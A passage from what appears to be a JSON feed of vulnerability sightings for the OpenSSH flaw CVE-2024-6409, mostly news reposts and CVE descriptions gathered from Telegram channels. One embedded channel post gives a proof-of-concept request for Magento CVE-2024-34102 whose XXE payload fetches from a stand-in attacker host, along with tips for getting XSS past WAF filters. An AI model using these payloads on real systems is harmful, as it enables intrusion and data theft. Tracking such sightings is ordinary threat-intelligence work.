Community debezium-ui v.2.5 \u062a\u0633\u0645\u062d \u0644\u0644\u0645\u0647\u0627\u062c\u0645 \u0627\u0644\u0645\u062d\u0644\u064a \u0628\u062a\u0646\u0641\u064a\u0630 \u062a\u0639\u0644\u064a\u0645\u0627\u062a \u0628\u0631\u0645\u062c\u064a\u0629 \u0639\u0634\u0648\u0627\u0626\u064a\u0629 \u0639\u0628\u0631 \u0648\u0638\u064a\u0641\u0629 \u062a\u062d\u062f\u064a\u062b \u0627\u0644\u0635\u0641\u062d\u0629.\n\nhttps://packetstormsecurity.com/files/178794/Debezium-UI-2.5-Credential-Disclosure.html\n\n\u064a\u0645\u0643\u0646 \u0623\u0646 \u064a\u0633\u0645\u062d IBM Security Verify Access Docker 10.0.0 \u062d\u062a\u0649 10.0.6 \u0644\u0644\u0645\u0633\u062a\u062e\u062f\u0645 \u0627\u0644\u0645\u062d\u0644\u064a \u0628\u062a\u0635\u0639\u064a\u062f \u0627\u0645\u062a\u064a\u0627\u0632\u0627\u062a\u0647 \u0628\u0633\u0628\u0628 \u0627\u0644\u062a\u062d\u0642\u0642 \u063a\u064a\u0631 \u0627\u0644\u0635\u062d\u064a\u062d \u0645\u0646 \u0627\u0644\u0634\u0647\u0627\u062f\u0629. \u0645\u0639\u0631\u0641 IBM X-Force: 292416.\n\nhttps://exchange.xforce.ibmcloud.com/vulnerabilities/292416\n\n\u064a\u0632\u064a\u0644 javascript-deobfuscator \u062a\u0642\u0646\u064a\u0627\u062a \u062a\u0634\u0648\u064a\u0634 JavaScript \u0627\u0644\u0634\u0627\u0626\u0639\u0629. \u0641\u064a \u0627\u0644\u0625\u0635\u062f\u0627\u0631\u0627\u062a \u0627\u0644\u0645\u062a\u0623\u062b\u0631\u0629\u060c \u064a\u0645\u0643\u0646 \u0623\u0646 \u062a\u0624\u062f\u064a \u0627\u0644\u062d\u0645\u0648\u0644\u0627\u062a \u0627\u0644\u0645\u0639\u062f\u0629 \u0648\u0627\u0644\u062a\u064a \u062a\u0633\u062a\u0647\u062f\u0641 \u062a\u0628\u0633\u064a\u0637 \u0627\u0644\u062a\u0639\u0628\u064a\u0631 \u0625\u0644\u0649 \u062a\u0646\u0641\u064a\u0630 \u0627\u0644\u062a\u0639\u0644\u064a\u0645\u0627\u062a \u0627\u0644\u0628\u0631\u0645\u062c\u064a\u0629. \u0644\u0642\u062f \u062a\u0645 \u062a\u0635\u062d\u064a\u062d \u0647\u0630\u0647 \u0627\u0644\u0645\u0634\u0643\u0644\u0629 \u0641\u064a \u0627\u0644\u0625\u0635\u062f\u0627\u0631 1.1.0. \u064a\u064f\u0646\u0635\u062d \u0627\u0644\u0645\u0633\u062a\u062e\u062f\u0645\u0648\u0646 \u0628\u0627\u0644\u062a\u062d\u062f\u064a\u062b. \u064a\u062c\u0628 \u0639\u0644\u0649 \u0627\u0644\u0645\u0633\u062a\u062e\u062f\u0645\u064a\u0646 \u063a\u064a\u0631 \u0627\u0644\u0642\u0627\u062f\u0631\u064a\u0646 \u0639\u0644\u0649 \u0627\u0644\u062a\u0631\u0642\u064a\u0629 \u062a\u0639\u0637\u064a\u0644 \u0645\u064a\u0632\u0629 \u062a\u0628\u0633\u064a\u0637 \u0627\u0644\u062a\u0639\u0628\u064a\u0631.\n\nhttps://github.com/ben-sb/javascript-deobfuscator/commit/630d3caec83d5f31c5f7a07e6fadf613d06699d6\n\n\u062d\u0633\u064a\u0646 \u0631\u0648\u0632\u0643\u0627\u0631:\nCVE-2024-36684\nCRITICAL\nInformation\nCPEs\nPlugins\nDescription\nIn the module \"Custom links\" (pk_customlinks) &lt;= 2.3 from Promokit.eu for PrestaShop, a guest can perform SQL injection. The script ajax.php have a sensitive SQL call that can be executed with a trivial http call and exploited to forge a SQL injection.\nReferences\nhttps://security.friendsofpresta.org/modules/2024/06/18/pk_customlinks.html\n\nALSED404:\npayload\n\n\n\n\n\n#Payload\n===================================\n#ALSED404\n\nCVE-2024-34102\u00a0 POC \n\nPOST /rest/V1/guest-carts/1/estimate-shipping-methods HTTP/2\n\n{\"address\":{\"totalsCollector\":{\"collectorList\":{\"totalCollector\":{\"sourceData\":{\"data\":\"http://attacker*com/xxe.xml\",\"dataIsURL\":true,\"options\":1337}}}}}}\n\n#CVE #POC\n\n===================================\n#ALSED404\n\nA Cloudflare WAF bypass combining simple (but efficient) tricks\n\n\n\nA payload with some obfuscation &amp; filter evasion tricks\n\n\n\n#CF #WAF #Bypass #Payload\n===================================\n#ALSED404\n\nXSS WAF Bypass by multi-char HTML entities\n\n&fjlig; translates to fj\n&nvgt; translates to &gt; + [?]\n&nvlt; translates to &lt; + [?]\n\n[?] - Unicode symbol\n\n#BugBounty #Tips\n===================================\n#ALSED404\n\nA Cloudflare WAF bypass combining simple (but efficient) tricks\n\n\n\nA payload with some obfuscation &amp; filter evasion tricks\n\n\n\n#CF #WAF #Bypass #Payload\n===================================\n#ALSED404\n\n\u0647\u0627 \u062c\u0645\u0627\u0639\u0629 \u0627\u0644\u0627\u064a\u0641\u0648\u0646 \ud83d\ude02\ud83d\ude02\ud83d\ude02\ud83d\ude02\n\ud83d\udd12 \u0645\u0637\u0648\u0631\u064a iOS \u0648macOS\u060c \u062a\u0646\u0628\u064a\u0647!\n\n\u0627\u0643\u062a\u0634\u0641 \u0643\u064a\u0641 \u064a\u0645\u0643\u0646 \u0623\u0646 \u062a\u0624\u062f\u064a 3 \u062b\u063a\u0631\u0627\u062a \u0623\u0645\u0646\u064a\u0629 \u062c\u062f\u064a\u062f\u0629 \u0641\u064a CocoaPods\u060c \u0625\u062d\u062f\u0649 \u0623\u062f\u0648\u0627\u062a \u0645\u0637\u0648\u0631\u064a Apple \u0627\u0644\u0634\u0647\u064a\u0631\u0629\u060c \u0625\u0644\u0649 \u0647\u062c\u0645\u0627\u062a \u0633\u0644\u0633\u0644\u0629 \u0627\u0644\u062a\u0648\u0631\u064a\u062f \u0639\u0644\u0649 \u062a\u0637\u0628\u064a\u0642\u0627\u062a iOS \u0648macOS.\n\n\u0627\u0644\u062a\u0641\u0627\u0635\u064a\u0644 \u0647\u0646\u0627: https://thehackernews.com/2024/07/critical-flaws-in-cocoapods-expose-ios.html\n#ALSED404\n\nPayload XSS: \n\n\n#Payload #XSS\n===================================\n#ALSED404\n\nDiscovered an XSS vulnerability but Imperva WAF blocked it?\nTry this XSS payload to bypass Imperva's protection.\n\n\n\n\n#BugBounty #Bypass_Imperva #Payload #XSS\n===================================\n#ALSED404\n\n\u062b\u063a\u0631\u0629 \u062c\u062f\u064a\u062f\u0629 \u0628\u0628\u0631\u0648\u062a\u0648\u0643\u0648\u0644 OpenSSH \u062a\u0646\u0637\u064a RCE \n\ud83d\udea8 New OpenSSH vulnerability (CVE-2024-6409) found in RHEL 9's versions 8.7p1 &amp; 8.8p1, allowing RCE via race condition in privsep child process. \n\nRead: https://thehackernews.com/2024/07/new-openssh-vulnerability-discovered.html \n\n\u26a0\ufe0f Active exploits detected! This bug is distinct from CVE-2024-6387 but shares similarities.\n#ALSED404", "creation_timestamp": "2024-12-13T19:00:21.000000Z"}, {"uuid": "fb8632a0-f8f6-440f-a2dd-36aa523f0545", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CVE-2024-6409", "type": "seen", "source": "Telegram/VqfWh7rHpMCbTwTmKsOFHeKJmX2q4zk1VlZFd9tptLMmZg", "content": "", "creation_timestamp": "2024-07-10T08:08:21.000000Z"}, {"uuid": "58296456-677a-4bb4-8a3b-facb95a92e1a", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CVE-2024-6409", "type": "published-proof-of-concept", "source": "https://t.me/HackingInsights/5786", "content": "\u200aA new flaw in OpenSSH can lead to remote code execution\n\nhttps://securityaffairs.com/165535/hacking/openssh-flaw-cve-2024-6409.html", "creation_timestamp": "2024-07-12T13:27:59.000000Z"}, {"uuid": "02d8c365-4287-444c-9a50-4bd8d5cb6468", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CVE-2024-6409", "type": "seen", "source": "https://t.me/HackingInsights/6336", "content": "The Potential Impact of the OpenSSH Vulnerabilities CVE-2024\u20136387 and CVE-2024-6409\nhttps://ift.tt/L8HkivS", "creation_timestamp": "2024-07-17T18:30:29.000000Z"}, {"uuid": "f082a6a5-9a59-4176-b165-94c8bd0aaee6", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CVE-2024-6409", "type": "seen", "source": "https://t.me/HackingInsights/6333", "content": "The Potential Impact of the OpenSSH Vulnerabilities CVE-2024\u20136387 and CVE-2024-6409\nhttps://ift.tt/L8HkivS", "creation_timestamp": "2024-07-17T18:30:28.000000Z"}, {"uuid": "94df3d50-c34d-45eb-9cba-8105003b91eb", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CVE-2024-6409", "type": "exploited", "source": "Telegram/74FvZzrxPZzOFcD3Z7htHxpXJWynycXIyH1ql7Vd7keQiMdK", "content": "", "creation_timestamp": "2024-07-10T06:13:07.000000Z"}, {"uuid": "78b20204-e067-4122-a65a-01510851ff19", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CVE-2024-6409", "type": "seen", "source": "https://t.me/tengkorakcybercrewz/14703", "content": "The Hacker News\nNew OpenSSH Vulnerability Discovered: Potential Remote Code Execution Risk\n\nSelect versions of the OpenSSH secure networking suite are susceptible to a new vulnerability that can trigger remote code execution (RCE).\nThe vulnerability, tracked as CVE-2024-6409 (CVSS score: 7.0), is distinct from CVE-2024-6387 (aka RegreSSHion) and relates to a case of code execution in the privsep child process due to a race condition in signal handling. It only impacts versions 8.7p1", "creation_timestamp": "2024-07-10T08:08:21.000000Z"}, {"uuid": "594f1b9c-1d4f-464a-97f3-07da14800da3", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CVE-2024-6409", "type": "exploited", "source": "https://t.me/thehackernews/5229", "content": "\ud83d\udea8 New OpenSSH vulnerability (CVE-2024-6409) found in RHEL 9's versions 8.7p1 &amp; 8.8p1, allowing RCE via race condition in privsep child process. \n \nRead: https://thehackernews.com/2024/07/new-openssh-vulnerability-discovered.html \n \n\u26a0\ufe0f Active exploits detected! This bug is distinct from CVE-2024-6387 but shares similarities.", "creation_timestamp": "2024-07-10T05:48:02.000000Z"}, {"uuid": "c8772446-7105-405d-95d8-074a8d3e3b4c", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CVE-2024-6409", "type": "seen", "source": "https://t.me/xakep_ru/16110", "content": "\u041e\u0431\u043d\u0430\u0440\u0443\u0436\u0435\u043d\u0430 \u0435\u0449\u0435 \u043e\u0434\u043d\u0430 \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u044c OpenSSH, \u0441\u0432\u044f\u0437\u0430\u043d\u043d\u0430\u044f \u0441 regreSSHion\n\n\u0412\u043e \u0432\u0440\u0435\u043c\u044f \u0430\u043d\u0430\u043b\u0438\u0437\u0430 \u043d\u0435\u0434\u0430\u0432\u043d\u043e \u043e\u0431\u043d\u0430\u0440\u0443\u0436\u0435\u043d\u043d\u043e\u0439 \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u0438 CVE-2024-6387 (regreSSHion) \u0432 OpenSSH \u0431\u044b\u043b\u0430 \u043d\u0430\u0439\u0434\u0435\u043d\u0430 \u0435\u0449\u0435 \u043e\u0434\u043d\u0430 \u043f\u0440\u043e\u0431\u043b\u0435\u043c\u0430 \u0443\u0434\u0430\u043b\u0435\u043d\u043d\u043e\u0433\u043e \u0432\u044b\u043f\u043e\u043b\u043d\u0435\u043d\u0438\u044f \u043a\u043e\u0434\u0430.\n\nhttps://xakep.ru/2024/07/16/cve-2024-6409/", "creation_timestamp": "2024-07-16T21:22:30.000000Z"}, {"uuid": "b3cac9a3-86d5-427f-9585-260f5ed6d8df", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CVE-2024-6409", "type": "seen", "source": "https://bsky.app/profile/beikokucyber.bsky.social/post/3lkbyl7bddz2z", "content": "", "creation_timestamp": "2025-03-13T21:02:10.212117Z"}, {"uuid": "23a7dc75-94be-4152-aafc-37f4b18c1cb4", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CVE-2024-6409", "type": "published-proof-of-concept", "source": "https://t.me/HackingInsights/5333", "content": "\u200aCVE-2024-6409: New Remote Code Execution Vulnerability in OpenSSH\n\nhttps://securityonline.info/cve-2024-6409-new-remote-code-execution-vulnerability-in-openssh/", "creation_timestamp": "2024-07-09T10:08:52.000000Z"}, {"uuid": "a9fe0c91-de66-45e7-8eb0-c85bf9839626", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CVE-2024-6409", "type": "seen", "source": "https://t.me/DarkWebInformer_CVEAlerts/17351", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2024-6409\n\ud83d\udd25 CVSS Score: 7 (cvssV3_1, Vector: CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:L/A:H)\n\ud83d\udd39 Description: A race condition vulnerability was discovered in how signals are handled by OpenSSH's server (sshd). If a remote attacker does not authenticate within a set time period, then sshd's SIGALRM handler is called asynchronously. However, this signal handler calls various functions that are not async-signal-safe, for example, syslog(). As a consequence of a successful attack, in the worst case scenario, an attacker may be able to perform a remote code execution (RCE) as an unprivileged user running the sshd server.\n\ud83d\udccf Published: 2024-07-08T17:57:10.517Z\n\ud83d\udccf Modified: 2025-05-22T19:17:16.728Z\n\ud83d\udd17 References:\n1. https://access.redhat.com/errata/RHSA-2024:4457\n2. https://access.redhat.com/errata/RHSA-2024:4613\n3. https://access.redhat.com/errata/RHSA-2024:4716\n4. https://access.redhat.com/errata/RHSA-2024:4910\n5. https://access.redhat.com/errata/RHSA-2024:4955\n6. https://access.redhat.com/errata/RHSA-2024:4960\n7. https://access.redhat.com/errata/RHSA-2024:5444\n8. https://access.redhat.com/security/cve/CVE-2024-6409\n9. https://bugzilla.redhat.com/show_bug.cgi?id=2295085", "creation_timestamp": "2025-05-22T19:46:06.000000Z"}, {"uuid": "6423edef-07cf-4ca6-8817-7140c58d268e", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CVE-2024-6409", "type": "seen", "source": "https://t.me/IRANGOBLIN_ir/305", "content": "\ud83c\udd95\ud83c\udd95\ud83c\udd95\ud83c\udd95\n\u041e\u0431\u043d\u0430\u0440\u0443\u0436\u0435\u043d\u0430 \u0435\u0449\u0435 \u043e\u0434\u043d\u0430 \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u044c OpenSSH, \u0441\u0432\u044f\u0437\u0430\u043d\u043d\u0430\u044f \u0441 regreSSHion\n\n\ud83d\udcdd\u0412\u043e \u0432\u0440\u0435\u043c\u044f \u0430\u043d\u0430\u043b\u0438\u0437\u0430 \u043d\u0435\u0434\u0430\u0432\u043d\u043e \u043e\u0431\u043d\u0430\u0440\u0443\u0436\u0435\u043d\u043d\u043e\u0439 \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u0438 CVE-2024-6387 (regreSSHion) \u0432 OpenSSH \u0431\u044b\u043b\u0430 \u0432\u044b\u044f\u0432\u043b\u0435\u043d\u0430 \u0435\u0449\u0435 \u043e\u0434\u043d\u0430 \u043f\u0440\u043e\u0431\u043b\u0435\u043c\u0430 \u0443\u0434\u0430\u043b\u0435\u043d\u043d\u043e\u0433\u043e \u0432\u044b\u043f\u043e\u043b\u043d\u0435\u043d\u0438\u044f \u043a\u043e\u0434\u0430.\n\n\ud83d\udcdd\u0421\u043f\u0435\u0446\u0438\u0430\u043b\u0438\u0441\u0442 Openwall \u0410\u043b\u0435\u043a\u0441\u0430\u043d\u0434\u0440 \u041f\u0435\u0441\u043b\u044f\u043a \u043e\u0431\u043d\u0430\u0440\u0443\u0436\u0438\u043b \u043d\u043e\u0432\u044b\u0439 \u0431\u0430\u0433, \u0441\u0432\u044f\u0437\u0430\u043d\u043d\u044b\u0439 \u0441 regreSSHion. \u041d\u043e\u0432\u0430\u044f \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u044c \u043f\u0440\u0435\u0434\u0441\u0442\u0430\u0432\u043b\u044f\u0435\u0442 \u0441\u043e\u0431\u043e\u0439 \u0441\u043e\u0441\u0442\u043e\u044f\u043d\u0438\u0435 \u0433\u043e\u043d\u043a\u0438 \u043f\u0440\u0438 \u043e\u0431\u0440\u0430\u0431\u043e\u0442\u043a\u0435 \u0441\u0438\u0433\u043d\u0430\u043b\u043e\u0432 \u0441 \u0443\u0447\u0430\u0441\u0442\u0438\u0435\u043c \u0434\u043e\u0447\u0435\u0440\u043d\u0435\u0433\u043e \u043f\u0440\u043e\u0446\u0435\u0441\u0441\u0430 privsep \u0438 \u043f\u043e\u043b\u0443\u0447\u0438\u043b\u0430 \u0438\u0434\u0435\u043d\u0442\u0438\u0444\u0438\u043a\u0430\u0442\u043e\u0440 CVE-2024-6409 (7 \u0431\u0430\u043b\u043b\u043e\u0432 \u043f\u043e \u0448\u043a\u0430\u043b\u0435 CVSS).\n\n\ud83d\udcdd\u0420\u0430\u0437\u0440\u0430\u0431\u043e\u0442\u0447\u0438\u043a\u0438 \u0437\u0430\u0442\u0440\u043e\u043d\u0443\u0442\u044b\u0445 \u0434\u0438\u0441\u0442\u0440\u0438\u0431\u0443\u0442\u0438\u0432\u043e\u0432 Linux \u0443\u0436\u0435 \u043d\u0430\u0447\u0430\u043b\u0438 \u0432\u044b\u043f\u0443\u0441\u043a\u0430\u0442\u044c \u0440\u0435\u043a\u043e\u043c\u0435\u043d\u0434\u0430\u0446\u0438\u0438 \u0438 \u0438\u0441\u043f\u0440\u0430\u0432\u043b\u0435\u043d\u0438\u044f \u0434\u043b\u044f CVE-2024-6409. Canonical \u0437\u0430\u044f\u0432\u0438\u043b\u0430, \u0447\u0442\u043e \u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u0442\u0435\u043b\u044f\u043c Ubuntu \u043d\u0435 \u0441\u0442\u043e\u0438\u0442 \u0432\u043e\u043b\u043d\u043e\u0432\u0430\u0442\u044c\u0441\u044f, \u043f\u043e\u0441\u043a\u043e\u043b\u044c\u043a\u0443 \u043d\u0438 \u043e\u0434\u043d\u0430 \u0438\u0437 \u043f\u043e\u0434\u0434\u0435\u0440\u0436\u0438\u0432\u0430\u0435\u043c\u044b\u0445 \u0432\u0435\u0440\u0441\u0438\u0439 \u043d\u0435 \u0438\u0441\u043f\u043e\u043b\u044c\u0437\u0443\u0435\u0442 \u0443\u043f\u043e\u043c\u044f\u043d\u0443\u0442\u044b\u0435 \u0440\u0435\u043b\u0438\u0437\u044b.\n\n\n\n\ud83c\uddf7\ud83c\uddfa \u0427\u0438\u0442\u0430\u0442\u044c \u043f\u043e\u043b\u043d\u043e\u0441\u0442\u044c\u044e\n\ud83c\uddfa\ud83c\uddf8 Read Full\n\n\ud83c\udf10 \u041e\u0431\u043c\u0435\u043d\u043d\u0438\u043a \u043a\u0440\u0438\u043f\u0442\u043e\u0432\u0430\u043b\u044e\u0442\u044b: \n\n\ud83d\udcac \u2014 \u0445\u0430\u043a\u0435\u0440\u0441\u043a\u0438\u0439 \u0447\u0430\u0442\n\ud83d\udcbb \u0412\u0441\u044f \u0438\u043d\u0444\u043e\u0440\u043c\u0430\u0446\u0438\u044f \u0441\u043e\u0437\u0434\u0430\u0435\u0442\u0441\u044f \u0438 \u0444\u0438\u043b\u044c\u0442\u0440\u0443\u0435\u0442\u0441\u044f AI:", "creation_timestamp": "2024-07-20T08:43:05.000000Z"}, {"uuid": "0d6459cb-2684-485c-a600-a1464ce311c6", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CVE-2024-6409", "type": "seen", "source": "https://t.me/cvedetector/210", "content": "{\n  \"Source\": \"CVE FEED\",\n  \"Title\": \"CVE-2024-6409 - A signal handler race condition vulnerability was\", \n  \"Content\": \"CVE ID : CVE-2024-6409 \nPublished : July 8, 2024, 6:15 p.m. | 26\u00a0minutes ago \nDescription : A signal handler race condition vulnerability was found in OpenSSH's server (sshd), where a client does not authenticate within LoginGraceTime seconds (120 by default, 600 in old OpenSSH versions), then sshd's SIGALRM handler is called asynchronously. However, this signal handler calls various functions that are not async-signal-safe, for example, syslog(). This issue leaves it vulnerable to a signal handler race condition on the cleanup_exit() function, which introduces the same vulnerability as CVE-2024-6387 in the unprivileged child of the SSHD server. \nSeverity: 7.0 | HIGH \nVisit the link for more details, such as CVSS details, affected products, timeline, and more...\",\n  \"Detection Date\": \"08 Jul 2024\",\n  \"Type\": \"Vulnerability\"\n}\n\ud83d\udd39 t.me/cvedetector \ud83d\udd39", "creation_timestamp": "2024-07-08T20:46:06.000000Z"}, {"uuid": "2e340330-328a-4710-a5f0-c2d2dc119bac", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CVE-2024-6409", "type": "seen", "source": "https://t.me/cyberden_team/513", "content": "\u041d\u043e\u0432\u0430\u044f \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u044c OpenSSH \u043a\u043e\u043c\u043f\u0440\u043e\u043c\u0435\u0442\u0438\u0440\u0443\u0435\u0442 \u0441\u0435\u0440\u0432\u0435\u0440\u044b RHEL 9\n\n\ud83d\udd13 \u041e\u0431\u043d\u0430\u0440\u0443\u0436\u0435\u043d\u0430 \u043d\u043e\u0432\u0430\u044f \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u044c CVE-2024-6409 \u0432 \u043f\u0430\u043a\u0435\u0442\u0430\u0445 OpenSSH \u0434\u043b\u044f RHEL 9. \u041e\u043d\u0430 \u043f\u043e\u0437\u0432\u043e\u043b\u044f\u0435\u0442 \u0437\u043b\u043e\u0443\u043c\u044b\u0448\u043b\u0435\u043d\u043d\u0438\u043a\u0430\u043c \u0432\u044b\u043f\u043e\u043b\u043d\u044f\u0442\u044c \u043a\u043e\u0434 \u043d\u0430 \u0443\u0434\u0430\u043b\u0435\u043d\u043d\u043e\u043c \u0441\u0435\u0440\u0432\u0435\u0440\u0435 \u0431\u0435\u0437 \u0430\u0443\u0442\u0435\u043d\u0442\u0438\u0444\u0438\u043a\u0430\u0446\u0438\u0438.\n\n\u23f1 \u0423\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u044c \u0441\u0432\u044f\u0437\u0430\u043d\u0430 \u0441 \u0441\u043e\u0441\u0442\u043e\u044f\u043d\u0438\u0435\u043c \u0433\u043e\u043d\u043a\u0438 (Race Condition) \u0432 \u043e\u0431\u0440\u0430\u0431\u043e\u0442\u0447\u0438\u043a\u0435 \u043f\u0440\u0435\u0440\u044b\u0432\u0430\u043d\u0438\u044f SIGALRM. \u041f\u0440\u043e\u0431\u043b\u0435\u043c\u0430 \u0432\u043e\u0437\u043d\u0438\u043a\u0430\u0435\u0442 \u0438\u0437-\u0437\u0430 \u0432\u044b\u043f\u043e\u043b\u043d\u0435\u043d\u0438\u044f \u0444\u0443\u043d\u043a\u0446\u0438\u0439, \u043d\u0435 \u0440\u0430\u0441\u0441\u0447\u0438\u0442\u0430\u043d\u043d\u044b\u0445 \u043d\u0430 \u0430\u0441\u0438\u043d\u0445\u0440\u043e\u043d\u043d\u043e\u0435 \u0432\u044b\u043f\u043e\u043b\u043d\u0435\u043d\u0438\u0435 \u0438\u0437 \u043e\u0431\u0440\u0430\u0431\u043e\u0442\u0447\u0438\u043a\u043e\u0432 \u0441\u0438\u0433\u043d\u0430\u043b\u043e\u0432.\n\n\ud83d\udee0 \u0414\u043b\u044f \u0443\u0441\u0442\u0440\u0430\u043d\u0435\u043d\u0438\u044f \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u0438 \u0440\u0435\u043a\u043e\u043c\u0435\u043d\u0434\u0443\u0435\u0442\u0441\u044f \u0443\u0441\u0442\u0430\u043d\u043e\u0432\u0438\u0442\u044c \u043f\u0430\u0440\u0430\u043c\u0435\u0442\u0440 LoginGraceTime \u0432 0 \u0432 \u043a\u043e\u043d\u0444\u0438\u0433\u0443\u0440\u0430\u0446\u0438\u0438 sshd. \u042d\u0442\u043e\u0442 \u043c\u0435\u0442\u043e\u0434 \u044d\u0444\u0444\u0435\u043a\u0442\u0438\u0432\u043d\u043e \u0431\u043b\u043e\u043a\u0438\u0440\u0443\u0435\u0442 \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u044c, \u0432 \u043e\u0442\u043b\u0438\u0447\u0438\u0435 \u043e\u0442 \u0441\u0442\u0430\u043d\u0434\u0430\u0440\u0442\u043d\u044b\u0445 \u0441\u043f\u043e\u0441\u043e\u0431\u043e\u0432 \u0437\u0430\u0449\u0438\u0442\u044b.\n\n#OpenSSH #\u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u044c #RHEL9 #InfoSec\n\n@ZerodayAlert", "creation_timestamp": "2024-07-11T19:54:07.000000Z"}, {"uuid": "c0e8b7df-5713-4aec-8b9f-9b0bb7749397", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CVE-2024-6409", "type": "seen", "source": "https://t.me/ctinow/220340", "content": "The Potential Impact of the OpenSSH Vulnerabilities CVE-2024\u20136387 and CVE-2024-6409\nhttps://ift.tt/L8HkivS", "creation_timestamp": "2024-07-17T10:49:15.000000Z"}, {"uuid": "3dc4b2e2-6250-4cf7-8f4c-87f95fead83c", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CVE-2024-6409", "type": "seen", "source": "https://t.me/ctinow/220337", "content": "The Potential Impact of the OpenSSH Vulnerabilities CVE-2024\u20136387 and CVE-2024-6409\nhttps://ift.tt/L8HkivS", "creation_timestamp": "2024-07-17T09:54:52.000000Z"}, {"uuid": "a4423559-dce3-417f-b922-e17dea4db4a5", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CVE-2024-6409", "type": "seen", "source": "https://t.me/S_E_Reborn/4929", "content": "\u041a \u043d\u0435\u0434\u0430\u0432\u043d\u0435\u0439 regreSSHion (CVE-2024-6387) \u043f\u0440\u0438\u0441\u043e\u0435\u0434\u0438\u043d\u044f\u0435\u0442\u0441\u044f \u043d\u043e\u0432\u0430\u044f \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u044c \u0432 \u043f\u0430\u043a\u0435\u0442\u0430\u0445 OpenSSH, \u043f\u043e\u0442\u0435\u043d\u0446\u0438\u0430\u043b\u044c\u043d\u043e \u043f\u043e\u0437\u0432\u043e\u043b\u044f\u044e\u0449\u0430\u044f \u0443\u0434\u0430\u043b\u0435\u043d\u043d\u043e\u0435 \u0432\u044b\u043f\u043e\u043b\u043d\u0435\u043d\u0438\u0435 \u043a\u043e\u0434\u0430 \u0432 \u0441\u0438\u0441\u0442\u0435\u043c\u0430\u0445 Red Hat Enterprise Linux (RHEL) 9 \u0438 \u043d\u0435\u043a\u043e\u0442\u043e\u0440\u044b\u0445 \u0432\u0435\u0440\u0441\u0438\u044f\u0445 Fedora.\n\nCVE-2024-6409 \u0438\u043c\u0435\u0435\u0442 \u0441\u0445\u043e\u0434\u0441\u0442\u0432\u043e \u0441\u043e \u0441\u0432\u043e\u0435\u0439 \u043f\u0440\u0435\u0434\u0448\u0435\u0441\u0442\u0432\u0435\u043d\u043d\u0438\u0446\u0435\u0439, \u043d\u043e \u0441\u0447\u0438\u0442\u0430\u0435\u0442\u0441\u044f \u043c\u0435\u043d\u0435\u0435 \u043e\u043f\u0430\u0441\u043d\u043e\u0439, \u043f\u043e\u0441\u043a\u043e\u043b\u044c\u043a\u0443 \u043f\u0440\u043e\u044f\u0432\u043b\u044f\u0435\u0442\u0441\u044f \u043f\u043e\u0441\u043b\u0435 \u0441\u0431\u0440\u043e\u0441\u0430 \u043f\u0440\u0438\u0432\u0438\u043b\u0435\u0433\u0438\u0439 \u0432 \u0434\u043e\u0447\u0435\u0440\u043d\u0435\u043c \u043f\u0440\u043e\u0446\u0435\u0441\u0441\u0435, \u0438\u043d\u0438\u0446\u0438\u0438\u0440\u043e\u0432\u0430\u043d\u043d\u043e\u043c \u0441\u0435\u0440\u0432\u0435\u0440\u043e\u043c 